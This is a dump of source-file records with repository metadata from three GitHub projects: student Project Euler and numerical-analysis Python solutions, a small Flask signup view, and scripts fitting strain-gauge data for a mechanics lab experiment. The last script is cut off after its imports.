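    sql = "INSERT INTO artists (first_name, last_name) VALUES (%s, %s) RETURNING id"
    values = [artist.first_name, artist.last_name]
    rows = run_sql(sql, values)   # parameterised query avoids SQL injection
    artist.id = rows[0]['id']     # keep the generated primary key on the object
    return artist
```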
atwinkles/Codes
https://github.com/atwinkles/Codes
087ce8356122f22a6fb092838e36156409468737
4c84484272a287f2228a486f605bd993192359f5
17c1a662ec838d398172acc17bf1eab465709be8
refs/heads/master
2020-11-24T08:09:43.988958
2017-03-14T03:13:14
2017-03-14T03:13:14
67,221,308
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5818058252334595, "alphanum_fraction": 0.5872369408607483, "avg_line_length": 51.60714340209961, "blob_id": "68ecfee8060e75d371b859858cc8ea1a54dee13c", "content_id": "8bc330eacf8e57463af096f2d3877b44847902d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1473, "license_type": "no_license", "max_line_length": 96, "num_lines": 28, "path": "/README.md", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "# Codes-\nA collection of the various codes I have developed throughout college.\n----------------------------------------------------------------------\n\nMATLAB:\n\n1. bisec.m - A MATLAB function that utilizes the bisection method to find the\n zeroes in functions. \n2. orbitaltrajectory.m - A MATLAB function (in development) that will model the orbits of\n satellites around Earth.\n3. newton.m - A MATLAB function that utilizes Newton's method to approximate\n zeroes in functions.\n4. steffensen.m - A MATLAB function that utilizes the Steffensen method to approximate\n zeroes in functions.\n\nMathematica:\n\n1. Surface2.nb - A Mathematica module designed to take a parametrized surface and \n return values of importance for differential geometry.\n2. OrbitalTrajectory.nb - A Mathematica module (in development) that will model the orbits\n of satellites around Earth and generate Keplerian elements.\n\nPython:\n\n1. Project Euler - A collection of all of my Project Euler codes written in Python. \n These codes are solely to demonstrate coding skills - if you are\n working on Project Euler I highly encourage you NOT to look at these\n as they take the fun out of the problems!\n" }, { "alpha_fraction": 0.3963133692741394, "alphanum_fraction": 0.5069124698638916, "avg_line_length": 11.764705657958984, "blob_id": "a55eaca0af02a0cc5264f0b0b25d7a4a57590922", "content_id": "556b6aaf03eade684ec7c9f3d8898e189c50c18f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 26, "num_lines": 17, "path": "/Python/Project Euler/006_sumsquare.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "\"\"\"\nresults = 0\nfor i in range(1,101):\n for j in range(1,101):\n results += i*j\n\nfor k in range(1,101):\n results -= k**2\nprint(results)\n\"\"\"\n\nn = 100\na = n*(n+1)/2\nb = (2*n+1)*(n+1)*n/6\n\nr = a^2+b\nprint(r)\n" }, { "alpha_fraction": 0.5592705011367798, "alphanum_fraction": 0.5775076150894165, "avg_line_length": 18.352941513061523, "blob_id": "80d37d22f048c3bee05c61bb0d8d47868dc39ab6", "content_id": "05c64e0ceb846612394d2aafb4691a0eb003f039", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 329, "license_type": "no_license", "max_line_length": 96, "num_lines": 17, "path": "/Python/Project Euler/016_power_digit_sum.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\ndef digit_sum(a,b):\n k = a**b\n summerino = 0\n j = str(k)\n for i in j:\n summerino += int(i)\n return summerino\n\nstart = time.time()\na = 2\nb = 1000\nk = digit_sum(a,b)\nelapsed = (time.time() - start)\n\nprint \"\\nThe sum of %s^%s's digits is %s, which was computed in %s seconds!\\n\" % (a,b,k,elapsed)\n" }, { "alpha_fraction": 0.5730858445167542, "alphanum_fraction": 0.5846867561340332, "avg_line_length": 18.590909957885742, "blob_id": "f857db5ed213d469d8d3a10421eb24c96faaeae9", "content_id": 
"93957b3ce5ac24d93603d9194fef5793f0563ba7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 431, "license_type": "no_license", "max_line_length": 98, "num_lines": 22, "path": "/Python/Project Euler/020_factorial_digit_sum.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\ndef factorial(n):\n fac = n\n for i in range(1,n):\n fac *= n-i\n return fac\n\ndef factorial_digit_sum(n):\n k = factorial(n)\n j = str(k)\n count = 0\n for i in j:\n count += int(i)\n return count\n\nstart = time.time()\nm = 100\nresult = factorial_digit_sum(m)\nelapsed = (time.time() - start)\n\nprint \"\\nThe sum of digits of %s! is %s, which was computed in %s seconds.\\n\" % (m,result,elapsed)\n" }, { "alpha_fraction": 0.490601509809494, "alphanum_fraction": 0.5357142686843872, "avg_line_length": 21.16666603088379, "blob_id": "5eb73eacf0fe65ef173261f5b0365f2c9972c1a8", "content_id": "509ced71a55a24110918cbe8a75a749f843f7257", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 532, "license_type": "no_license", "max_line_length": 118, "num_lines": 24, "path": "/Python/Project Euler/014_collatz_sequence.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\ndef collatz(n):\n count = 1\n while n > 1:\n if n % 2 == 0:\n n = n/2\n count += 1\n else:\n n = 3*n + 1\n count += 1\n return count\n\nstart = time.time()\nresult = [13]\nfor a in range(1,1000000):\n if collatz(a) > collatz(result[-1]):\n result.append(a)\n\n#print(result[-1])\n#print(collatz(result[-1]))\n\nelapsed = (time.time() - start)\nprint 'The result %s with a chain of length %s was computing in %s seconds' % (result[-1],collatz(result[-1]),elapsed)\n" }, { "alpha_fraction": 0.5531914830207825, "alphanum_fraction": 0.6808510422706604, "avg_line_length": 14.666666984558105, "blob_id": "97064f2421c3c35c74c93a27350021ff659aa425", "content_id": "16c9bbb38d341e504715fe6c958408865ede3f95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47, "license_type": "no_license", "max_line_length": 26, "num_lines": 3, "path": "/Python/Project Euler/031_coin_sums.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time, numpy\n\n1p = numpy.poly1d([1]*200)\n" }, { "alpha_fraction": 0.4566929042339325, "alphanum_fraction": 0.5118110179901123, "avg_line_length": 14.875, "blob_id": "da2d36704a49be44f01da6146c3b58f9e15aa91f", "content_id": "d58833e02db132df03a631dc5d1d9c4f8f8fd395", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 254, "license_type": "no_license", "max_line_length": 36, "num_lines": 16, "path": "/Python/Project Euler/003_largestprime.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import numpy as np\n\ni = 600851475143\n\nresults = []\n\nfor j in range(2,int(np.sqrt(i))):\n while i % j == 0:\n i = i/j\n if results.count(j) == True:\n continue\n else:\n results.append(j)\n\nr = max(results)\nprint(r)\n" }, { "alpha_fraction": 0.45355191826820374, "alphanum_fraction": 0.4972677528858185, "avg_line_length": 13.076923370361328, "blob_id": "c00f2617c759e348d71aab7734024fca2ab9f4c0", "content_id": "649b06eee55691a2448f72d2589bf4c6965ee9de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 183, "license_type": "no_license", "max_line_length": 25, "num_lines": 13, "path": 
"/Python/Project Euler/001_threefives.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "results = []\n\nfor i in range(1000): \n if i % 3 == 0:\n results.append(i)\n elif i % 5 == 0:\n results.append(i)\n else:\n continue\n\ns = sum(results)\n\nprint(s)\n" }, { "alpha_fraction": 0.486868679523468, "alphanum_fraction": 0.5494949221611023, "avg_line_length": 15.5, "blob_id": "a3ae7edf9f7f85a828b70ab34de4c8c840ce9ce4", "content_id": "4b87e95201fa465761cc3d1c62730279ecd5199f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 495, "license_type": "no_license", "max_line_length": 35, "num_lines": 30, "path": "/Python/Project Euler/045_tri_pent_hex.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\ndef tri(n):\n return n*(n+1)/2\n\ndef pent(n):\n return n*(3*n-1)/2\n\ndef hexi(n):\n return n*(2*n-1)\n\ntrivalues = []\npentvalues = []\nhexvalues = []\n\nfor i in range(286,10000):\n trivalues.append(tri(i))\n\nfor i in range(166,10000):\n pentvalues.append(pent(i))\n\nfor i in range(144,10000):\n hexvalues.append(hexi(i))\n\nfor i in hexvalues:\n for j in pentvalues:\n for k in trivalues:\n if (i == j) & (i == k):\n print k\n break\n" }, { "alpha_fraction": 0.4803149700164795, "alphanum_fraction": 0.5157480239868164, "avg_line_length": 12.11111068725586, "blob_id": "7ccdaed5981ed221c8667d5edccb1a767dae2b35", "content_id": "279e6f43627df7821afd91d5957bf16b042d7516", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 254, "license_type": "no_license", "max_line_length": 83, "num_lines": 18, "path": "/Python/Project Euler/025_fibonacci_digit.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\r\n\r\na = 1\r\nb = 1\r\nc = 2\r\n\r\ni = 3\r\n\r\nstart = time.time()\r\n\r\nwhile len(str(c)) < 1000:\r\n\ta = b\r\n\tb = c\r\n\tc = b + a\r\n\ti += 1\r\n\r\nelapsed = (time.time() - start)\r\nprint \"\\nThe index of %d is %d. 
This was computed in %d seconds!\\n\" % (c,i,elapsed)\r\n" }, { "alpha_fraction": 0.41055718064308167, "alphanum_fraction": 0.47800585627555847, "avg_line_length": 17.947368621826172, "blob_id": "9ec9bf0ef99c1410141b4124490a5e208a415ed8", "content_id": "4974890219e3140c31b562eb1d4cbb4c8f51cea9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 341, "license_type": "no_license", "max_line_length": 48, "num_lines": 19, "path": "/Python/Project Euler/007_10001prime.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import math\n\ncount = 0\n\ndef is_prime(n):\n    if n % 2 == 0 and n > 2:\n        return False\n    for i in range(3, int(math.sqrt(n)) + 1, 2):\n        if n % i == 0:\n            return False\n    return True\n\nfor i in range (2,20000000):\n    if is_prime(i):\n        count += 1\n    if count == 10001:\n        print(i)\n        break\n" }, { "alpha_fraction": 0.6609686613082886, "alphanum_fraction": 0.6723646521568298, "avg_line_length": 26, "blob_id": "136cbf98cb6a9dfc36092819d82e1635e7fb5b10", "content_id": "416a4ada79410cfd515caea416cfddd9d98057d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 351, "license_type": "no_license", "max_line_length": 130, "num_lines": 13, "path": "/Python/Project Euler/015_lattice_paths.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import math,time\n\ndef lattice_routes(m,n):\n    k = math.factorial(m + n)/(math.factorial(n)*math.factorial(m))\n    return k\n\nstart = time.time()\nm = 20\nn = 20\nfinal = lattice_routes(m,n)\nelapsed = (time.time() - start)\n\nprint \"The solution to the number of lattice paths for a %s x %s grid is %s and was computed in %s seconds\" % (m,n,final,elapsed)\n" }, { "alpha_fraction": 0.43247127532958984, "alphanum_fraction": 0.4382183849811554, "avg_line_length": 30.636363983154297, "blob_id": "ae0d5567416b9002b7cde35634bc44e3f720f44a", "content_id": "1ce2a25af36e096e08637a15c256e3c37d3e2382", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 696, "license_type": "no_license", "max_line_length": 108, "num_lines": 22, "path": "/Python/Numerical Analysis/numerical.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\nimport numpy as np\n\ndef bisect(f,a,b,S,T):\n    if np.sign(np.polyval(f,a)) == np.sign(np.polyval(f,b)):\n        print \"\\nError: f(a) and f(b) have the same signs.\"\n    else:\n        i = 0\n        while i <= S:\n            e = b - a\n            e /= 2\n            c = a + e\n            if abs(np.polyval(f,c)) < T:\n                print \"\\nThe solution is %g. 
The computation was a success after %d iterations!\\n\\n\" % (c,i)\n break\n i += 1\n if np.sign(np.polyval(f,a)) == np.sign(np.polyval(f,c)):\n a = c\n else:\n b = c \n if i == S+1:\n print \"\\nMethod failed after %d iterations.\\n\\n\" % (S)\n" }, { "alpha_fraction": 0.5701754093170166, "alphanum_fraction": 0.5964912176132202, "avg_line_length": 18.826086044311523, "blob_id": "01f898c7c93eac3fcde38e0034637ce27ffdfeb6", "content_id": "b2a9171488702a5db3a024f5fe0315451de98acc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 456, "license_type": "no_license", "max_line_length": 154, "num_lines": 23, "path": "/Python/Project Euler/030_digit_fifth.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\ndef digit_fifth(n):\n k = str(n)\n tot = 0\n for i in k:\n tot += (int(i))**5\n return tot\n\nstart = time.time()\n\nres = []\nfor i in range(2,10000000):\n if i == digit_fifth(i):\n res.append(i)\n\ntotal = 0\nfor i in res:\n total += i\n\nelapsed = (time.time() - start)\n\nprint \"\\nThe sum of all numbers which are equal to the sum of the fifth power of their digits is %d. This was computed in %d seconds!\\n\" % (total,elapsed)\n" }, { "alpha_fraction": 0.599571704864502, "alphanum_fraction": 0.6788008809089661, "avg_line_length": 24.94444465637207, "blob_id": "c7505b75eaae6f32339f7a9e34a10b2616d201c9", "content_id": "b588f94d870aedd6c73d0e25c2c970e0ba61688e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 467, "license_type": "no_license", "max_line_length": 194, "num_lines": 18, "path": "/Python/Project Euler/040_champernowne_constant.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\nstart = time.time()\n\nchampernowne = \"\"\n\ncount = 0\n\nwhile count < 1000000:\n count += 1\n champernowne += str(count)\n\n#print champernowne\nprint (int(champernowne[0])* int(champernowne[9])* int(champernowne[10**2-1]) * int(champernowne[10**3-1]) * int(champernowne[10**4-1]) * int(champernowne[10**5-1]) * int(champernowne[10**6-1]))\n#print champernowne[10]\n\nelapsed = (time.time() - start)*1000\nprint \"This was computed in %d miliseconds\" % (elapsed)\n" }, { "alpha_fraction": 0.420895516872406, "alphanum_fraction": 0.5223880410194397, "avg_line_length": 16.63157844543457, "blob_id": "b51f853be6f15f64b6bd61dd18ee2a7123d14aab", "content_id": "42d70ba6e51334ae5099dd5b1a93ab9f9a95c0ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 335, "license_type": "no_license", "max_line_length": 36, "num_lines": 19, "path": "/Python/Project Euler/005_smallestmultiple.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "'''\nresults = []\nresults2 = []\nfor i in range(1,10000000):\n for j in range(1,21):\n if i % j == 0:\n results.append(i)\n else:\n continue\n \n if results.count(i) == 20:\n results2.append(i)\nr = min(results2)\n#print(results)\nprint(r)\n'''\n\nanswer = 2*2*2*2*3*3*5*7*11*13*17*19\nprint(answer)\n" }, { "alpha_fraction": 0.590395450592041, "alphanum_fraction": 0.6271186470985413, "avg_line_length": 19.764705657958984, "blob_id": "c831b5b5c45d0d55b76177a6574c986131c1d794", "content_id": "4f38783b7c34370f38e0b26f4a4d9700b203fc51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 354, "license_type": "no_license", "max_line_length": 79, "num_lines": 17, "path": "/Python/Project 
Euler/048_self_powers.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\ndef self_power(n):\n return n**n\n\ndef series(n):\n result = 0\n for i in range(1, n+1):\n result += self_power(i)\n return result\n\nstart = time.time()\nfinal = series(1000)\nsfinal = str(final)[len(str(final))-10:]\nelapsed = (time.time() - start)\n\nprint \"The result, %s, was computed in %d miliseconds\" % (sfinal, elapsed*1000)\n\n" }, { "alpha_fraction": 0.3885135054588318, "alphanum_fraction": 0.45270270109176636, "avg_line_length": 15.44444465637207, "blob_id": "d576939593e010d2335f64f13d8a284ac0322d07", "content_id": "11edfe3b77c7c5c1dd7867cee50decfe49621093", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 296, "license_type": "no_license", "max_line_length": 34, "num_lines": 18, "path": "/Python/Project Euler/002_fibonacci.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "def fib(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fib(n-1) + fib(n-2)\n\nresult = []\n\nfor i in range(1000):\n if fib(i) < 4000000:\n if fib(i) % 2 == 0:\n result.append(fib(i)) \n else:\n break\nr = sum(result)\nprint(r)\n" }, { "alpha_fraction": 0.48826292157173157, "alphanum_fraction": 0.5164319276809692, "avg_line_length": 16.75, "blob_id": "97ddb841d617e09a9d3fc1e7faf9b46586a75488", "content_id": "8be3bdff9ff2d2f3717aadc3b51ca2ccfa0f9d61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 639, "license_type": "no_license", "max_line_length": 153, "num_lines": 36, "path": "/Python/Project Euler/034_digit_fac.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "import time\n\ndef fac(n):\n if n == 0:\n return 1\n elif n == 1:\n return 1\n else:\n tot = 1\n while n > 1:\n tot *= n\n n -= 1\n return tot\n\ndef digit_fac(n):\n k = str(n)\n tot = 0\n for i in k:\n tot += fac(int(i))\n\n return tot \n\nstart = time.time()\n\nres = []\nfor i in range(3,10000000):\n if i == digit_fac(i):\n res.append(i)\n\ntotal = 0\nfor i in res:\n total += i \n\nelapsed = (time.time() - start)\n\nprint \"\\nThe sum of all numbers which are equal to the sum of the factorial of their digits is %d. 
This was computed in %d seconds!\\n\" % (total, elapsed)\n" }, { "alpha_fraction": 0.2908163368701935, "alphanum_fraction": 0.3877550959587097, "avg_line_length": 31.66666603088379, "blob_id": "9ae6b06d6a085b2ecec92569812369b67e0ef0d8", "content_id": "0d209d0ed64eefa66875e09a57f79dc7e781d454", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 196, "license_type": "no_license", "max_line_length": 63, "num_lines": 6, "path": "/Python/Project Euler/009_triple.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "for a in range(0,700):\n for b in range(0,700):\n for c in range(0,700):\n if a + b + c == 1000 and (a**2) + (b**2) == (c**2):\n print(a*b*c)\n break\n" }, { "alpha_fraction": 0.4534161388874054, "alphanum_fraction": 0.5093167424201965, "avg_line_length": 15.100000381469727, "blob_id": "a88e7e0f04c472a383fa21457cc4955564b5358e", "content_id": "d4f2b6f006b5a879a49d34f0c5f58dfada9ad218", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 161, "license_type": "no_license", "max_line_length": 38, "num_lines": 10, "path": "/Python/Project Euler/004_largestpalindrome.py", "repo_name": "atwinkles/Codes", "src_encoding": "UTF-8", "text": "results = []\n\nfor j in range(1000):\n for k in range(1000):\n if str(j*k) == str(j*k)[::-1]:\n results.append(j*k)\n\nr = max(results)\n\nprint(r)\n" } ]
21
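numerical.py above implements the bisection half of the README's root-finding list; the Newton's method entry exists only as MATLAB (newton.m), which this record does not include. An illustrative Python analogue of that method, not a port of the MATLAB file:

```python
def newton(f, df, x0, tol=1e-10, max_iter=50):
    # Newton-Raphson: repeat x <- x - f(x)/df(x) until the step is below tol.
    x = x0
    for _ in range(max_iter):
        step = f(x) / df(x)
        x -= step
        if abs(step) < tol:
            return x
    raise RuntimeError("Newton's method did not converge in %d iterations" % max_iter)

print(newton(lambda x: x * x - 2, lambda x: 2 * x, 1.0))  # ~1.4142135623730951
```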
ibbad/BucketListApp
https://github.com/ibbad/BucketListApp
9dbec49ebe736fa106b7989ec1ceb1f7a993ef61
00af5312a9f3f5ba7d34770b3dcf2b8095967a24
0348db5cfe8f0a20986dab9861908ccdac1c99ad
refs/heads/master
2021-01-19T06:02:54.529506
2016-06-26T07:00:57
2016-06-26T07:00:57
61,977,747
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6285979747772217, "alphanum_fraction": 0.6285979747772217, "avg_line_length": 28.108108520507812, "blob_id": "c882ec60b3977fb237a926c4dd8810b2239cf5e8", "content_id": "9a0d38b2262a9c4cb3fefc190124eb2fcb1752ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1077, "license_type": "no_license", "max_line_length": 74, "num_lines": 37, "path": "/app/main/views.py", "repo_name": "ibbad/BucketListApp", "src_encoding": "UTF-8", "text": "import json\nfrom . import main\nfrom .. import db\nfrom ..models import User\nfrom flask import render_template, request\n\n\[email protected]('/')\ndef index():\n return render_template('index.html')\n\n\[email protected]('/signupform')\ndef show_signup():\n return render_template('signup.html')\n\n\[email protected]('/signup', methods=['POST', 'GET'])\ndef signup():\n # Read form values from incoming request\n _name = request.form['inputName']\n _email = request.form['inputEmail']\n _password = request.form['inputPassword']\n\n # validate values\n if _name and _email and _password:\n if User.query.filter_by(email=_email).first() is not None:\n return json.dumps(\n {'error': '<span>User already registered.<span>'})\n # add user to database.\n user = User(name=_name, email=_email, password=_password)\n db.session.add(user)\n db.session.commit()\n return json.dumps(\n {'html': '<span>User successfully registered.<span>'})\n else:\n return json.dumps({'html': '<span>Enter required inputs.</span>'})\n" } ]
1
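The signup view above hands the raw form password straight to the `User` constructor; whether it gets hashed depends on the model, which this record does not include. A common sketch hashes before persisting, using Werkzeug's helpers (the idea of a separate stored hash field is an assumption about the model, not something the record confirms):

```python
from werkzeug.security import generate_password_hash, check_password_hash

# Hypothetical: store a salted hash instead of the plain-text password.
pw_hash = generate_password_hash(_password)
# ...persist pw_hash on the user record, then verify at login time:
assert check_password_hash(pw_hash, _password)
```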
XieJiongyan/SJTU-EM341-experience2
https://github.com/XieJiongyan/SJTU-EM341-experience2
29a18ed05401161516905868dbba77c770ddb98c
55a56f63d70370bcdbea51e93206b3106e3614e4
d358b65e4a100564fc5186dcbf7fc63a327c9b11
refs/heads/main
2023-02-11T02:22:35.772368
2020-12-25T07:00:08
2020-12-25T07:00:08
324,306,872
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4541003704071045, "alphanum_fraction": 0.535699725151062, "avg_line_length": 32.52112579345703, "blob_id": "221e587e1bad68223d5a3cb063962e5d422fbc3a", "content_id": "6f89ed05916dc99932aa81efa2ad4c757f067936", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2553, "license_type": "no_license", "max_line_length": 99, "num_lines": 71, "path": "/q2.py", "repo_name": "XieJiongyan/SJTU-EM341-experience2", "src_encoding": "UTF-8", "text": "import pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\nfrom sklearn import linear_model \r\n\r\n# 由实验一得到的已知数据\r\nE = 214.6e9\r\nI_y = 29.9e-6 * 9e-4\r\n# import data\r\ndf = pd.read_csv('input/data123.csv')\r\nexperiments = np.arange(1, 7)\r\ndf_exprmnts = [0] * 7\r\nfor i in experiments:\r\n df_exprmnts[i] = df[df['experiment'] == i]\r\n\r\n# sgs = [2, 5, 3, 7, 8, 11, 9]\r\n# sg_places = 1e-2 * np.array([[2, 0], [1.79, 0], [0.5, 0], [0,0.6],[0,2.6], [0, 2.78], [0, 4.6]])\r\nsgs = [3, 7, 8, 9]\r\nsg_places = 1e-2 * np.array([[0.5, 0], [0,0.6],[0,2.6], [0, 4.6]])\r\n# sgs = [2, 3, 7, 8, 9]\r\n# sg_places = 1e-2 * np.array([[2, -0.05], [0.5, -0.05], [-0.05,0.6],[-0.05,2.6], [-0.05, 4.6]])\r\n# print(sg_places)\r\nhat_z_dir = np.array([np.cos(122.78 * np.pi / 180), np.sin(122.78 * np.pi / 180)])\r\nhat_y_dir = np.array([np.cos(32.78 * np.pi / 180), np.sin(32.78 * np.pi / 180)])\r\n\r\ncentroid = 1e-2 * np.array([0.89, 1.39])\r\n# print(centroid)\r\nhat_zs = [0] * len(sgs)\r\nfor i in range(len(sgs)):\r\n hat_zs[i] = np.dot(hat_z_dir, sg_places[i] - centroid)\r\n print(hat_zs[i])\r\n\r\nprint('places')\r\nprint(np.dot(hat_z_dir, [0, 0.05] - centroid))\r\n# print(np.dot(hat_y_dir, [0, 0.050] - centroid))\r\nprint(np.dot(hat_z_dir, [0, 0] - centroid))\r\n# print(np.dot(hat_y_dir, [0, 0] - centroid))\r\nprint(np.dot(hat_z_dir, [0.040, 0] - centroid))\r\n# print(np.dot(hat_y_dir, [0.040, 0] - centroid))\r\n\r\nBC = []\r\n# for expr in [1, 2]:\r\n#解决中文显示问题\r\nplt.rcParams['font.sans-serif'] = ['KaiTi'] # 指定默认字体\r\nplt.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题\r\n\r\nfor expr in [1, 2]:\r\n nd_dif = np.array(df_exprmnts[expr][['sg' + str(i) for i in sgs]])\r\n # print(nd_dif)\r\n for i in range(4):\r\n nd_dif[i, :] = nd_dif[i + 1, :] - nd_dif[i, :]\r\n nd_dif = np.delete(nd_dif, -1, axis = 0)\r\n # print(nd_dif)\r\n for i in range(4):\r\n plt.plot(hat_zs, [j * 1e-6 * E - 800. / 81e-6 for j in nd_dif[i, :]])\r\n # print([j * 1e-6 * E - 800. / 81e-6 for j in nd_dif[i, :]])\r\n clf = linear_model.LinearRegression()\r\n clf.fit([[i] for i in hat_zs], [j * 1e-6 * E - 800. 
/ 81e-6 for j in nd_dif[i, :]])\r\n        M_I_y = clf.coef_ \r\n        # print(type(M_I_y))\r\n        BC += [np.abs(M_I_y[0] * I_y / 800.)]\r\n        # print(BC)\r\n\r\n\r\nprint(BC)\r\nprint(type(pd.Series(BC)))\r\nprint(pd.Series(BC).describe())\r\nplt.legend(['试验' + str(i + 1) for i in range (8)])\r\nplt.xlabel(r'$z^*$')\r\nplt.ylabel(r'弯矩引起的应力$\\sigma_x$(Pa)')\r\nplt.show()\r\n" }, { "alpha_fraction": 0.42809996008872986, "alphanum_fraction": 0.5058934688568115, "avg_line_length": 29.62686538696289, "blob_id": "fdbd077adba5eb4ef96e5485b7c7dfdaba2c43d6", "content_id": "d9f47b68770dfa727404465886536c2becbf4186", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2143, "license_type": "no_license", "max_line_length": 95, "num_lines": 67, "path": "/q3method1.py", "repo_name": "XieJiongyan/SJTU-EM341-experience2", "src_encoding": "UTF-8", "text": "import pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\nfrom sklearn import linear_model \r\n\r\n# Known data obtained from experiment 1\r\nE = 214.6e9\r\nI_y = 29.9e-6 * 9e-4\r\nA = 81e-6\r\n# import data\r\ndf = pd.read_csv('input/data123.csv')\r\nexperiments = np.arange(1, 7)\r\ndf_exprmnts = [0] * 7\r\nfor i in experiments:\r\n    df_exprmnts[i] = df[df['experiment'] == i]\r\n\r\n# sgs = [2, 3, 7, 8, 9]\r\n# sg_places = 1e-2 * np.array([[2, -0.05], [0.5, -0.05], [-0.05,0.6],[-0.05,2.6],[-0.05, 4.6]])\r\nsgs = [3, 7, 8, 9]\r\nsg_places = 1e-2 * np.array([[0.5, 0.01], [0,0.6],[0,2.6],[0, 4.6]])\r\n\r\nr2s = []\r\nmses = []\r\nfor deg in np.arange(1, 90):\r\n    #\r\n    xs = []\r\n    ys = []\r\n    hat_z_dir = np.array([np.cos((90 + deg) * np.pi / 180), np.sin(122.78 * np.pi / 180)])\r\n    hat_y_dir = np.array([np.cos(deg * np.pi / 180), np.sin(32.78 * np.pi / 180)])\r\n\r\n    centroid = 1e-2 * np.array([0.89, 1.39])\r\n    hat_zs = [0] * len(sgs)\r\n    for i in range(len(sgs)):\r\n        hat_zs[i] = np.dot(hat_z_dir, sg_places[i] - centroid)\r\n\r\n    for expr in [1, 2]:\r\n        nd_dif = np.array(df_exprmnts[expr][['sg' + str(i) for i in sgs]])\r\n        for i in range(4):\r\n            nd_dif[i, :] = nd_dif[i + 1, :] - nd_dif[i, :]\r\n        nd_dif = np.delete(nd_dif, -1, axis = 0)\r\n        for i in range(4):\r\n            # plt.plot(hat_zs, [j * 1e-6 * E - 800. / 81e-6 for j in nd_dif[i, :]])\r\n            xs += [[i] for i in hat_zs]\r\n            ys += [j * 1e-6 * E - 800. 
/ 81e-6 for j in nd_dif[i, :]]\r\n\r\n    clf = linear_model.LinearRegression()\r\n    clf.fit(xs, ys)\r\n    r2 = clf.score(xs, ys)\r\n    mse = np.dot(clf.predict(xs) - ys, clf.predict(xs) - ys) / len(xs)\r\n    # for i in range(len(xs)):\r\n    #     mse += (clf.predict(i) - ys) ** 2\r\n    # mse /= len(xs)\r\n    if deg == 32:\r\n        print(clf.coef_, clf.intercept_, (800 / A - clf.intercept_) / clf.coef_)\r\n    r2s += [r2]\r\n    mses += [mse]\r\n\r\nprint(r2s)\r\nfig = plt.figure() \r\nax1 = fig.add_subplot(111)\r\nax1.plot(np.arange(1, 90), r2s)\r\nax2 = ax1.twinx()\r\nax2.plot(np.arange(1, 90), mses, 'y')\r\nax2.set_xlim([0, 90])\r\nax1.legend(['R^2'], loc = 2)\r\nax2.legend(['MSE'], loc = 1)\r\nplt.show()\r\n\r\n" }, { "alpha_fraction": 0.4509888291358948, "alphanum_fraction": 0.5133275985717773, "avg_line_length": 25.046510696411133, "blob_id": "e27357aadb3e4051b1e825fa24f08c07683afd95", "content_id": "477953985bd4a4e9b525b41d2f8c8e8b8e8e8e8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2348, "license_type": "no_license", "max_line_length": 76, "num_lines": 86, "path": "/q3method2.py", "repo_name": "XieJiongyan/SJTU-EM341-experience2", "src_encoding": "UTF-8", "text": "import pandas as pd \r\nimport numpy as np 